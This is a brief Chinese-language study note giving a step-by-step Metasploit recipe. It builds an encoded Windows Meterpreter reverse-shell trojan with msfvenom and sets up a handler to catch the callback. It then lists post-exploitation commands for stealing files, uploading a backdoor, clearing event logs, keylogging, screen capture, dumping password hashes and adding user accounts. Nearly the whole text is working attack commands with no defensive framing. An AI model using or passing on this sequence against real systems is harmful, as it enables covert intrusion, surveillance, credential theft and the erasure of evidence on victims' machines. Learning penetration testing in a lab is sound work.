“注 本文为笔者学习过程中记录”
Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe
生成一个名为 test.exe 的木马文件到msf目录下
Step2: 通过 msfconsole 命令进入metasploit :
Step3: Use exploit/multi/handler 进入到监听模式。
Step4:设置payload反弹 Set payload windows/meterpreter/reverse_tcp
step5: 设置LHOST、LPORT参数
set LHOST 192.168.1.143(要监听的本地IP)
set LPORT 12345(要监听本地端口)
Step6:exploit攻击开始(开始监听设置的本地端口)
当靶机运行test文件后,即可在kali 端获取连接。
meterpreter一些常用命令:
getwd 当前目录
dir 查看所有文件
cat c:\\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\\(上传到的目录) 上传文件
download c:\\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息
键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop
屏幕截图
screenshot
屏幕监控
run vnc
获取密文密码
hashdump
shell
获取shell,进入cmd
cmd下(测试机是windows):
dir:显示所有文件
cd:切换目录
whoami 查看当前用户级别
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码